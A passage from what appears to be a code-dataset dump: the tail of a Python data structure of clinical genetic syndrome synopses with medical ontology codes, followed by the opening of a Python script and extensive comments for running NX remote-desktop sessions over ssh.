'skeletalSpine': '''Spinal rigidity {UMLS C1858025 HP:0003306} {HPO HP:0003306 C1858025};\nHyperlordosis {SNOMEDCT:249710008,61960001} {ICD10CM:M40.5} {UMLS C0024003 HP:0003307} {HPO HP:0003307 C0024003};\nScoliosis {SNOMEDCT:298382003,20944008,111266001} {ICD10CM:Q67.5,M41,M41.9} {UMLS C0559260,C0036439,C4552773,C0700208 HP:0002650} {HPO HP:0002650 C0037932,C0700208};\nAtlanto-axial instability {UMLS C3150511}''',
'skinNailsHairHair': '''Acanthosis nigricans {SNOMEDCT:72129000,402599005} {ICD10CM:L83} {UMLS C0000889 HP:0000956} {HPO HP:0000956 C0000889};\nHirsutism (less common) {UMLS C3150512} {HPO HP:0001007 C0019572}''',
'muscleSoftTissue': '''Muscle weakness, proximal {SNOMEDCT:249939004} {UMLS C0221629 HP:0003701} {HPO HP:0003701 C0221629,C1838869};\nMuscle weakness, generalized {ICD10CM:M62.81} {ICD9CM:728.87} {UMLS C0746674 HP:0003324} {HPO HP:0003324 C0746674};\nExercise intolerance {SNOMEDCT:267044007} {UMLS C0424551 HP:0003546} {HPO HP:0003546 C0424551};\nPercussion-induced muscle mounding (muscle rippling) {UMLS C3150502};\nMuscle hypertrophy {SNOMEDCT:249829006} {UMLS C0236033,C2265792 HP:0003712} {HPO HP:0003712 C2265792};\nProminent muscular appearance {UMLS C3150503};\nMyalgia {SNOMEDCT:68962001} {ICD10CM:M79.1} {UMLS C0231528,C4552646 HP:0003326} {HPO HP:0003326 C0231528};\nMuscle stiffness {SNOMEDCT:16046003} {UMLS C4085861,C0221170 HP:0003552} {HPO HP:0003552 C0221170};\nMuscle biopsy shows dystrophic changes {UMLS C1864711 HP:0003560} {HPO HP:0003560 C0026850,C1864711};\nDecreased sarcolemmal immunostaining for PTRF {UMLS C3150504};\nSecondary loss of sarcolemmal caveolin-3 {UMLS C3150505};\nDecreased caveolae in muscle tissue {UMLS C3150506};\nLoss of subcutaneous fat, generalized {UMLS C3150507}''',
'endocrineFeatures': '''Hyperinsulinemia {SNOMEDCT:83469008,131103005} {ICD10CM:E16.1} {UMLS C0020459,C0852795 HP:0000842} {HPO HP:0000842 C0020459};\nInsulin resistance {SNOMEDCT:48606007,763325000} {UMLS C0021655,C4049994 HP:0000855} {HPO HP:0000855 C0021655};\nAcromegaloid features {UMLS C3150500};\nDecreased growth hormone secretion (1 patient) {UMLS C3150501}''',
'immunology': '''Transient IgA deficiency (1 patient) {UMLS C3150509};\nRecurrent infections {SNOMEDCT:451991000124106} {UMLS C0239998 HP:0002719} {HPO HP:0002719 C0239998};\nDefective humoral immunity {UMLS C3150510 HP:0005368} {HPO HP:0005368 C3150510}''',
'laboratoryAbnormalities': '''Increased serum creatine kinase {UMLS C0241005 HP:0003236} {HPO HP:0003236 C0151576,C0241005};\nIncreased serum triglycerides {SNOMEDCT:166848004} {UMLS C0813230 HP:0002155} {HPO HP:0002155 C1522137};\nAbnormal liver enzymes {SNOMEDCT:166643006} {UMLS C0438237 HP:0002910} {HPO HP:0002910 C0086565,C0151766,C0235996,C0438237,C0438717,C0877359,C1842003,C1848701}''',
'miscellaneous': '''Onset in infancy or early childhood {UMLS C1837138};\nSudden death due to cardiac arrhythmia may occur {UMLS C3150514}''',
'molecularBasis': 'Caused by mutation in the RNA polymerase I and transcript release factor gene (PTRF, {603198.0001})',
'inheritanceExists': True,
'growthExists': True,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': True,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': True,
'cardiovascularHeartExists': True,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': True,
'abdomenLiverExists': True,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': True,
'abdomenGastrointestinalExists': True,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': True,
'skeletalSkullExists': False,
'skeletalSpineExists': True,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': True,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': True,
'muscleSoftTissueExists': True,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': True,
'hematologyExists': False,
'immunologyExists': True,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': True,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613385,
'prefix': '#',
'preferredTitle': 'AUTOIMMUNE DISEASE, MULTISYSTEM, WITH FACIAL DYSMORPHISM; ADMFD',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'growthHeight': 'Below 3rd percentile {UMLS C3278794}',
'growthWeight': 'Below 3rd percentile {UMLS C3278794}',
'headAndNeckHead': '''Macrocephaly, relative {SNOMEDCT:3961000119101} {UMLS C1849075 HP:0004482} {HPO HP:0004482 C1849075};\nDolichocephaly {SNOMEDCT:72239002} {ICD10CM:Q67.2} {UMLS C0221358 HP:0000268} {HPO HP:0000268 C0221358,C4280653,C4280654,C4280655,C4280656} {EOM ID:e09c1185a1ef3e38 IMG:Dolichocephaly-small.jpg};\nProminent occiput {UMLS C1853737 HP:0000269} {HPO HP:0000269 C1853737,C4280652} {EOM ID:be559f6b4bd52c20 IMG:Occiput,Prominent-small.jpg};\nFrontal bossing {SNOMEDCT:90145001} {UMLS C0221354 HP:0002007} {HPO HP:0002007 C0221354} {EOM ID:a223995bdef3e8d6 IMG:Frontal_Bossing-small.jpg}''',
'headAndNeckFace': '''Flattened midface {UMLS C3278797};\nSmall chin {UMLS C1839323 HP:0000331} {HPO HP:0000331 C1839323,C3697248}''',
'headAndNeckEars': '''Low-set ears {SNOMEDCT:95515009} {ICD10CM:Q17.4} {UMLS C0239234 HP:0000369} {HPO HP:0000369 C0239234};\nPosteriorly rotated ears {SNOMEDCT:253251006} {UMLS C0431478 HP:0000358} {HPO HP:0000358 C0431478}''',
'headAndNeckEyes': 'Proptosis {SNOMEDCT:18265008} {ICD10CM:H05.20} {ICD9CM:376.30} {UMLS C0015300 HP:0000520} {HPO HP:0000520 C0015300,C1837760,C1848490,C1862425} {EOM ID:765f49f1e824f0d2 IMG:Proptosis-small.jpg}',
'respiratoryLung': '''Pneumonitis, cellular, nonspecific interstitial {UMLS C2750127};\nSevere chronic lung disease {UMLS C3278799};\nRespiratory failure, fatal (in some patients) {UMLS C3278800}''',
'abdomenLiver': 'Hepatomegaly {SNOMEDCT:80515008} {ICD10CM:R16.0} {ICD9CM:789.1} {UMLS C0019209 HP:0002240} {HPO HP:0002240 C0019209}',
'abdomenSpleen': 'Splenomegaly {SNOMEDCT:16294009} {ICD10CM:R16.1} {ICD9CM:789.2} {UMLS C0038002 HP:0001744} {HPO HP:0001744 C0038002}',
'abdomenGastrointestinal': '''Enteropathy, autoimmune (in some patients) {UMLS C3278795};\nChronic diarrhea (in some patients) {UMLS C3278796} {HPO HP:0002028 C0401151}''',
'skeletalHands': '''Camptodactyly {SNOMEDCT:29271008} {UMLS C0221369,C0685409 HP:0012385} {HPO HP:0012385 C0685409} {EOM ID:e2dc697e402380a8 IMG:Camptodactyly-large-small.jpg};\nClinodactyly {SNOMEDCT:17268007} {UMLS C4551485,C0265610 HP:0030084,HP:0040019} {HPO HP:0030084 C0265610,C4280304} {EOM ID:483af428f909c76c IMG:Clinodactyly-small.jpg}''',
'neurologicCentralNervousSystem': '''Psychomotor delay {SNOMEDCT:398991009,224958001} {ICD10CM:F88} {UMLS C0424230,C0557874 HP:0025356,HP:0001263} {HPO HP:0001263 C0557874,C1864897,C4020875};\nGlobal hypotonia {UMLS C3278793}''',
'endocrineFeatures': '''Hypothyroidism, autoantibody-positive (in some patients) {UMLS C3278791};\nDiabetes mellitus, type 1 (rare) {UMLS C3278792}''',
'molecularBasis': 'Caused by mutation in the homolog of the mouse itchy gene (ITCH, {606409.0001})',
'inheritanceExists': True,
'growthExists': True,
'growthHeightExists': True,
'growthWeightExists': True,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': True,
'headAndNeckFaceExists': True,
'headAndNeckEarsExists': True,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': True,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': True,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': True,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': True,
'abdomenGastrointestinalExists': True,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': True,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': True,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': True,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': False,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613328,
'preferredTitle': 'ROIFMAN-CHITAYAT SYNDROME',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'headAndNeckFace': '''Hypoplastic supraorbital ridges {UMLS C1861869 HP:0009891} {HPO HP:0009891 C1861869,C4020777} {EOM ID:c86a7dfe73086e4e IMG:Supraorbital_Ridges,Underdeveloped-small.jpg};\nSquare chin {UMLS C3150515}''',
'headAndNeckEyes': '''Lacrimal duct stenosis {SNOMEDCT:231841004} {UMLS C0238300 HP:0007678} {HPO HP:0007678 C0238300};\nThin optic nerves {UMLS C3151694};\nPuffy and droopy eyelids {UMLS C3150517};\nHypertelorism {SNOMEDCT:22006008} {ICD10CM:Q75.2} {ICD9CM:376.41} {UMLS C0020534 HP:0000316} {HPO HP:0000316 C0020534} {EOM ID:71d9f1be67c7f8b6 IMG:Eyes,Widely_Spaced-small.jpg}''',
'headAndNeckNose': '''Flat nasal bridge {UMLS C1836542 HP:0005280} {HPO HP:0005280 C1836542,C3550546,C4280495} {EOM ID:000fb29123c16757 IMG:Nasal_Bridge,Depressed-small.jpg};\nBroad nasal root {SNOMEDCT:249321001} {UMLS C1849367 HP:0000431} {HPO HP:0000431 C1839764,C1849367}''',
'headAndNeckMouth': 'Thin lower lip {UMLS C2053440 HP:0010282} {HPO HP:0010282 C2053440}',
'headAndNeckNeck': 'Short neck {SNOMEDCT:95427009} {UMLS C0521525 HP:0000470} {HPO HP:0000470 C0521525} {EOM ID:c75e63fd749ec7a8 IMG:Neck,Short-small.jpg}',
'cardiovascularVascular': 'Aberrant subclavian artery {SNOMEDCT:93353003} {UMLS C0431498}',
'respiratoryAirways': 'Pneumonia {SNOMEDCT:233604007} {UMLS C0032285 HP:0002090} {HPO HP:0002090 C0032285}',
'abdomenExternalFeatures': 'Umbilical hernia {SNOMEDCT:396347007,5867007} {ICD10CM:Q79.2,K42,K42.9} {ICD9CM:553.1} {UMLS C1306503,C0041636,C0019322 HP:0001537} {HPO HP:0001537 C0019322}',
'abdomenGastrointestinal': 'Esophageal dyskinesia {SNOMEDCT:79962008,266434009} {ICD10CM:K22.4} {ICD9CM:530.5} {UMLS C0014858}',
'genitourinaryKidneys': 'Cross-fused renal ectopia {UMLS C1835796 HP:0004736}',
'skeletal': '''Osteopenia {SNOMEDCT:312894000,78441005} {UMLS C0029453 HP:0000938} {HPO HP:0000938 C0029453,C0747078};\nCone-shaped epiphyses {UMLS C1865037 HP:0010579} {HPO HP:0010579 C1865037}''',
'skeletalHands': 'Short metacarpals {UMLS C1837084 HP:0010049} {HPO HP:0010049 C1837084}',
'skeletalFeet': 'Short metatarsals {UMLS C1849020 HP:0010743} {HPO HP:0010743 C1849020}',
'neurologicCentralNervousSystem': '''Myoclonic seizures {SNOMEDCT:37356005} {UMLS C4317123,C0014550 HP:0002123} {HPO HP:0002123 C0014550,C0751778,C4021759};\nDevelopmental delay {SNOMEDCT:248290002,224958001} {ICD10CM:F88} {ICD9CM:315.9} {UMLS C0424605,C0557874 HP:0001263} {HPO HP:0001263 C0557874,C1864897,C4020875};\nDilated ventricles {SNOMEDCT:6210001} {ICD10CM:I51.7} {UMLS C0264733,C3278923 HP:0002119} {HPO HP:0002119 C3278923}''',
'immunology': '''Repeated invasive infections {UMLS C3150518};\nArthritis {SNOMEDCT:3723001} {ICD10CM:M19.90} {UMLS C4552845,C0003864 HP:0001369} {HPO HP:0001369 C0003864};\nNormal or elevated lymphocytes {UMLS C3150519};\nLow T-cell function {UMLS C3150520};\nLow IgG with antibody deficiency {UMLS C3150521}''',
'miscellaneous': 'One family with 2 sisters have been reported (as of March 2010) {UMLS C3150522}',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': True,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': True,
'headAndNeckMouthExists': True,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': True,
'cardiovascularExists': True,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': True,
'respiratoryExists': True,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': True,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': True,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': True,
'genitourinaryExists': True,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': True,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': True,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': True,
'skeletalFeetExists': True,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': True,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': False,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613387,
'prefix': '%',
'preferredTitle': 'FATTY LIVER DISEASE, NONALCOHOLIC, SUSCEPTIBILITY TO, 2; NAFLD2',
'inheritance': 'Multifactorial {UMLS C1837655}',
'abdomenLiver': 'Fatty liver (hepatic steatosis), nonalcoholic {UMLS C3278766}',
'miscellaneous': 'Genetic heterogeneity {UMLS C0242960 HP:0001425} {HPO HP:0001425 C0242960}',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': True,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': False,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613329,
'prefix': '#',
'preferredTitle': 'PLASMINOGEN ACTIVATOR INHIBITOR-1 DEFICIENCY',
'inheritance': '''Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899};\nAutosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}''',
'hematology': '''Increased bleeding after trauma, surgery, or injury {UMLS C3278771};\nHematomas after trauma or injury {UMLS C3278772};\nBleeding defect due to decreased plasminogen activator inhibitor-1 {UMLS C3278773};\nDecreased euglobin lysis time {UMLS C3278774};\nIncreased fibrinolysis {SNOMEDCT:89470004} {UMLS C0151648,C2314905};\nMenorrhagia {SNOMEDCT:386692008} {ICD10CM:N92.0} {UMLS C0025323,C4553737 HP:0000132} {HPO HP:0000132 C0025323}''',
'miscellaneous': '''Congenital onset {UMLS C1836142 HP:0003577} {HPO HP:0003577 C1836142,C2752013};\nSpontaneous bleeding is rare {UMLS C3278776};\nFavorable management with the fibrinolysis inhibitors (e.g., epsilon-aminocaproic acid and tranexamic acid) {UMLS C3278777}''',
'molecularBasis': 'Caused by mutation in the serpin peptidase inhibitor, clade E, member 1 gene (SERPINE1, {173360.0001})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': True,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
}
} ]
}
} } |
17,062 | 47c21a53740132c5adc3c4f490bad8655493ffda | #!/usr/bin/env python
# coding: UTF-8
"""Usage: %prog [OPTIONS] host:<DISPLAY#>
View the NX session <DISPLAY#> on host. If it is not running, it will be
started, and ~/.nxstartup will be executed by the shell.
See the source code for more information.
"""
# This script handles starting and reconnecting to an NX session over
# an encrypted ssh connection. It replaces the 'FreeNX' package.
#
# - There is no GUI. Does not work with standard client.
# - Sound and file sharing are not handled
# - Does not add a user with a widely-known ssh private key to the system
# - Uses the installed system ssh, so that custom PAM modules on the server
# (e.g. RSA SecurID) will work
# - Only requires 'nxproxy' somewhere on PATH and an X server on the
# client, and 'nxagent' somewhere on PATH on the server
# - Magic cookies are not left world-readable
# - ssh port forwardings are secured
# TODO:
# [ ] Figure out the issues with resuming a session on a display different
# from the one on which it was started, e.g. connect from a client
# running in Xvnc and in Windows.
# [ ] Change compression parameters on resuming a session
# Outline of script:
# ssh to terminal host
# Start terminal server if not running
# Send cookie to terminal client
# Start terminal client
# The NX protocol passes over the ssh connection, so it is encrypted and
# you don't have to worry about firewalls.
# The terminology and various pieces of stuff can get quite confusing. The
# page titled "Building and Using NX Open Source Components" on the web
# (http://www.nomachine.com/documents/technology/building-components-3.1.0.php)
# describes it, but not in a way that was at all clear to me, and there is
# a general lack of documentation that I will try to rectify here.
#
# In X11, display clients receive keystrokes and send draw messages to a
# display server, which normally has a physical keyboard and display.
#
# Display Client -- xterm
# ↕
# Display Server -- monitor and keyboard
#
# The first component that NX provides is nxproxy, which compresses the X
# protocol, so that the connection uses less bandwidth. It is transparent
# to the applications that pass their data through it. Logically:
#
# Display Client -- xterm
# ↕
# nxproxy
# ↕
# Display Server -- monitor and keyboard
#
# and physically
#
# Display Client -- xterm
# ↕
# nxproxy client
# ↕
# <Narrow link>
# ↕
# nxproxy server
# ↕
# Display Server -- monitor and keyboard
#
# Each piece could be on a physically distinct machine. To start a proxy
# display :4 connecting to the proxy server on port 4004 which then
# draws on the physical display :0 (X display $n is generally accessible as
# TCP port 600n. NX defaults to using 400n for the TCP port serving NX
# protocol.)
#
# # On proxy server
# DISPLAY="${DISPLAY_SERVER}:0" nxproxy -s :4 listen=4004
#
# # On proxy client, start serving X protocol on port 6004
# nxproxy -C "${PROXY_SERVER}:4" port=4004
#
# # On display client, start client
# DISPLAY="${PROXY_CLIENT}:4" xterm
#
# The X messages from the xterm are sent to the proxy client listening on
# TCP port 6004, which compresses them and sends them to the proxy server
# listening on TCP port 4004, which decompresses them and sends them to the
# physical display server.
#
# This reduces the total bandwidth requirements. Bandwidth can also be
# reduced by configuring nxproxy to cache, downsample, and lossily compress
# images.
#
# However this is still a bit slow. X applications are developed on the
# same machine, or at least the same local network, as their servers. There
# are still many round-trips of no visual importance between the client and
# the server, e.g. to get window properties or look up atoms. In addition
# to reducing bandwidth, latency can be reduced by sending only X traffic
# corresponding to visual updates.
#
# There is a program called Xnest that draws a window with a new X display
# inside. If this is placed between the X applications and the physical
# display, only traffic corresponding to visual updates needs to be sent.
#
# Display Client -- xterm
# ↕
# Xnest display server
# Xnest client
# ↕
# nxproxy client
# ↕
# <Slow, narrow link>
# ↕
# nxproxy server
# ↕
# Display Server -- monitor and keyboard
#
# In this configuration, most X protocol request are handled immediately by
# the Xnest server. Visual updates get compressed and sent to the physical
# display server.
#
# NX provides a program, nxagent, based on Xnest, that is an X server, an X
# client, and an nxproxy client -- all the parts corresponding to the
# remote side of the link. When an nxproxy server connects to an nxagent
# instance, nxagent sends the X messages to draw a window, paints the
# current display image, and then starts sending screen updates as they
# occur. These updates are all in X protocol, so they are fairly efficient
# -- to draw a string, it is enough to send the text and the font name,
# which will compress well.
#
# This script runs on the physical display server. It will:
# - Start nxagent on the remote host
# nxagent -display nx/nx,listen=4008:8 :8
# - Start a proxy server on the local host
# nxproxy -S remote:8
# When the proxy server connects to the remote nxagent, nxagent will draw
# the virtual display on the local display.
#
# Reasons this script isn't just those two lines:
# - nxagent has to be started if it isn't running
# - it has to be HUPed if it is
# - (unless it's already waiting for a connection)
# - &c.
# - the above setup lets anyone connect to the display and install a
# keylogger
# - the above setup doesn't encrypt any data, so someone wouldn't even
# have to connect to your display to log your keystrokes
# - &c.
from __future__ import with_statement
from __future__ import division
from optparse import OptionParser
import os
from path import path
import pwd
import re
import signal
import socket
import subprocess
import sys
import time
FAILURE_SENTINEL = 'Crumbled.'
def cmd_from_pid(pid):
try:
with open('/proc/%d/cmdline' % pid, 'r') as f:
cmdline = f.read()
return cmdline.split('\0', 1)[0]
except:
return None
def get_nx_root():
return os.getenv('NX_ROOT', path('~').expanduser().joinpath('.nx'))
def write_options(filename, options, display):
with open(filename, 'w') as f:
f.write(','.join('%s=%s' % (k,v)
for k, v in options.iteritems()))
f.write(':%d' % display)
def split_option_str(optionstr):
"foo=bar,baz=wtf -> {'foo': 'bar', 'baz': 'wtf'}"
options = optionstr.split(',')
return dict(opt.split('=', 1) for opt in options)
